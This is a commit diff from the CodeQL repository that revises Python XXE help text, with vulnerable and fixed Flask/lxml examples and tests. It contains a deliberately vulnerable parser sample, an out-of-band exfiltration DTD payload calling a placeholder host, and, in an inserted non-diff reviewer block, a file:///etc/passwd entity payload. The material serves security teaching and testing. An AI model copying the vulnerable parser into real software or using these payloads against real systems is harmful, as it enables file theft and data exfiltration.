mirror of
https://github.com/github/codeql.git
synced 2026-04-29 18:55:14 +02:00
Python: Adjust XXE qhelp
and remove the old copy, we don't need it anymore :)
committed by
Rasmus Wriedt Larsen
parent
c365337867
commit
b00766b054
@@ -15,29 +15,34 @@ and out-of-band data retrieval techniques may allow attackers to steal sensitive
 <p>
 The easiest way to prevent XXE attacks is to disable external entity handling when
 parsing untrusted data. How this is done depends on the library being used. Note that some
-libraries, such as recent versions of <code>libxml</code>, disable entity expansion by default,
+libraries, such as recent versions of the XML libraries in the standard library of Python 3,
+disable entity expansion by default,
 so unless you have explicitly enabled entity expansion, no further action needs to be taken.
 </p>
+
+<p>
+We recommend using the <a href="https://pypi.org/project/defusedxml/">defusedxml</a>
+PyPI package, which has been created to prevent XML attacks (both XXE and XML bombs).
+</p>
 </recommendation>
 
 <example>
 <p>
-The following example uses the <code>libxml</code> XML parser to parse a string <code>xmlSrc</code>.
-If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since
-the parser is invoked with the <code>noent</code> option set to <code>true</code>:
+The following example uses the <code>lxml</code> XML parser to parse a string
+<code>xml_src</code>. That string is from an untrusted source, so this code is
+vulnerable to an XXE attack, since the <a href="https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XMLParser">
+default parser</a> from <code>lxml.etree</code> allows local external entities to be resolved.
 </p>
-<sample src="examples/Xxe.js"/>
+<sample src="examples/XxeBad.py"/>
 
 <p>
-To guard against XXE attacks, the <code>noent</code> option should be omitted or set to
-<code>false</code>. This means that no entity expansion is undertaken at all, not even for standard
-internal entities such as <code>&amp;amp;</code> or <code>&amp;gt;</code>. If desired, these
-entities can be expanded in a separate step using utility functions provided by libraries such
-as <a href="http://underscorejs.org/#unescape">underscore</a>,
-<a href="https://lodash.com/docs/4.17.15#unescape">lodash</a> or
-<a href="https://github.com/mathiasbynens/he">he</a>.
+To guard against XXE attacks with the <code>lxml</code> library, you should create a
+parser with <code>resolve_entities</code> set to <code>False</code>. This means that no
+entity expansion is undertaken, although standard predefined entities such as
+<code>&amp;gt;</code>, for writing <code>&gt;</code> inside the text of an XML element,
+are still allowed.
 </p>
-<sample src="examples/XxeGood.js"/>
+<sample src="examples/XxeGood.py"/>
 </example>
 
 <references>
@@ -53,5 +58,13 @@ Timothy Morgen:
 Timur Yunusov, Alexey Osipov:
 <a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.
 </li>
+<li>
+Python 3 standard library:
+<a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
+</li>
+<li>
+Python 2 standard library:
+<a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
+</li>
 </references>
 </qhelp>

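Reviewer note: as a rough illustration of the behaviour the revised qhelp text describes, the sketch below uses only the standard library's `xml.etree.ElementTree` (not `lxml`). The payload strings and the `parse_text` helper are hypothetical names made up for this note and are not part of the commit. Assuming a Python 3 interpreter with the default expat-based parser, predefined entities such as `&lt;` should still be decoded, while a reference to an external entity is expected to be rejected with a `ParseError` rather than resolved.

```python
import xml.etree.ElementTree as ET

# Hypothetical payloads, for illustration only.
PREDEFINED = '<?xml version="1.0"?>\n<test>&lt;</test>'
EXTERNAL = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
    '<test>&xxe;</test>'
)


def parse_text(xml_src):
    """Return the root element's text, or None if the parser refuses the input."""
    try:
        return ET.fromstring(xml_src).text
    except ET.ParseError:
        # ElementTree does not resolve external entities; the reference to
        # &xxe; is reported as an undefined entity instead.
        return None


if __name__ == "__main__":
    print(repr(parse_text(PREDEFINED)))
    print(repr(parse_text(EXTERNAL)))
```

This only demonstrates the standard-library default; `lxml` behaves differently, which is why the qhelp recommends an explicit `resolve_entities=False` parser there.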
@@ -1,7 +0,0 @@
-const app = require("express")(),
-  libxml = require("libxmljs");
-
-app.post("upload", (req, res) => {
-  let xmlSrc = req.body,
-    doc = libxml.parseXml(xmlSrc, { noent: true });
-});
@@ -0,0 +1,10 @@
+from flask import Flask, request
+import lxml.etree
+
+app = Flask(__name__)
+
+@app.post("/upload")
+def upload():
+    xml_src = request.get_data()
+    doc = lxml.etree.fromstring(xml_src)
+    return lxml.etree.tostring(doc)
@@ -1,7 +0,0 @@
-const app = require("express")(),
-  libxml = require("libxmljs");
-
-app.post("upload", (req, res) => {
-  let xmlSrc = req.body,
-    doc = libxml.parseXml(xmlSrc);
-});
@@ -0,0 +1,11 @@
+from flask import Flask, request
+import lxml.etree
+
+app = Flask(__name__)
+
+@app.post("/upload")
+def upload():
+    xml_src = request.get_data()
+    parser = lxml.etree.XMLParser(resolve_entities=False)
+    doc = lxml.etree.fromstring(xml_src, parser=parser)
+    return lxml.etree.tostring(doc)
@@ -1,48 +0,0 @@
-<!DOCTYPE qhelp PUBLIC
-"-//Semmle//qhelp//EN"
-"qhelp.dtd">
-<qhelp>
-
-<overview>
-<p>
-Parsing untrusted XML files with a weakly configured XML parser may lead to attacks such as XML External Entity (XXE),
-Billion Laughs, Quadratic Blowup and DTD retrieval.
-This type of attack uses external entity references to access arbitrary files on a system, carry out denial of
-service, or server side request forgery. Even when the result of parsing is not returned to the user, out-of-band
-data retrieval techniques may allow attackers to steal sensitive data. Denial of services can also be carried out
-in this situation.
-</p>
-</overview>
-
-<recommendation>
-<p>
-Use <a href="https://pypi.org/project/defusedxml/">defusedxml</a>, a Python package aimed
-to prevent any potentially malicious operation.
-</p>
-</recommendation>
-
-<example>
-<p>
-The following example calls <code>xml.etree.ElementTree.fromstring</code> using a parser (<code>lxml.etree.XMLParser</code>)
-that is not safely configured on untrusted data, and is therefore inherently unsafe.
-</p>
-<sample src="XmlEntityInjection.py"/>
-<p>
-Providing an input (<code>xml_content</code>) like the following XML content against /bad, the request response would contain the contents of
-<code>/etc/passwd</code>.
-</p>
-<sample src="XXE.xml"/>
-</example>
-
-<references>
-<li>Python 3 <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
-<li>Python 2 <a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
-<li>Python <a href="https://www.edureka.co/blog/python-xml-parser-tutorial/">XML Parsing</a>.</li>
-<li>OWASP vulnerability description: <a href="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing">XML External Entity (XXE) Processing</a>.</li>
-<li>OWASP guidance on parsing xml files: <a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python">XXE Prevention Cheat Sheet</a>.</li>
-<li>Paper by Timothy Morgen: <a href="https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/">XML Schema, DTD, and Entity Attacks</a></li>
-<li>Out-of-band data retrieval: Timur Yunusov &amp; Alexey Osipov, Black hat EU 2013: <a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.</li>
-<li>Denial of service attack (Billion laughs): <a href="https://en.wikipedia.org/wiki/Billion_laughs">Billion Laughs.</a></li>
-</references>
-
-</qhelp>
@@ -74,6 +74,10 @@ exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
 <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
 """
 
+predefined_entity_xml = """<?xml version="1.0"?>
+<test>&lt;</test>
+"""
+
 # ==============================================================================
 # other setup
 
@@ -443,6 +447,13 @@ class TestLxml:
 
         assert exfiltrated_data == "SECRET_FLAG"
 
+    @staticmethod
+    def test_predefined_entity():
+        parser = lxml.etree.XMLParser(resolve_entities=False)
+        root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)
+        assert root.tag == "test"
+        assert root.text == "<"
+
 # ==============================================================================
 
 import xmltodict
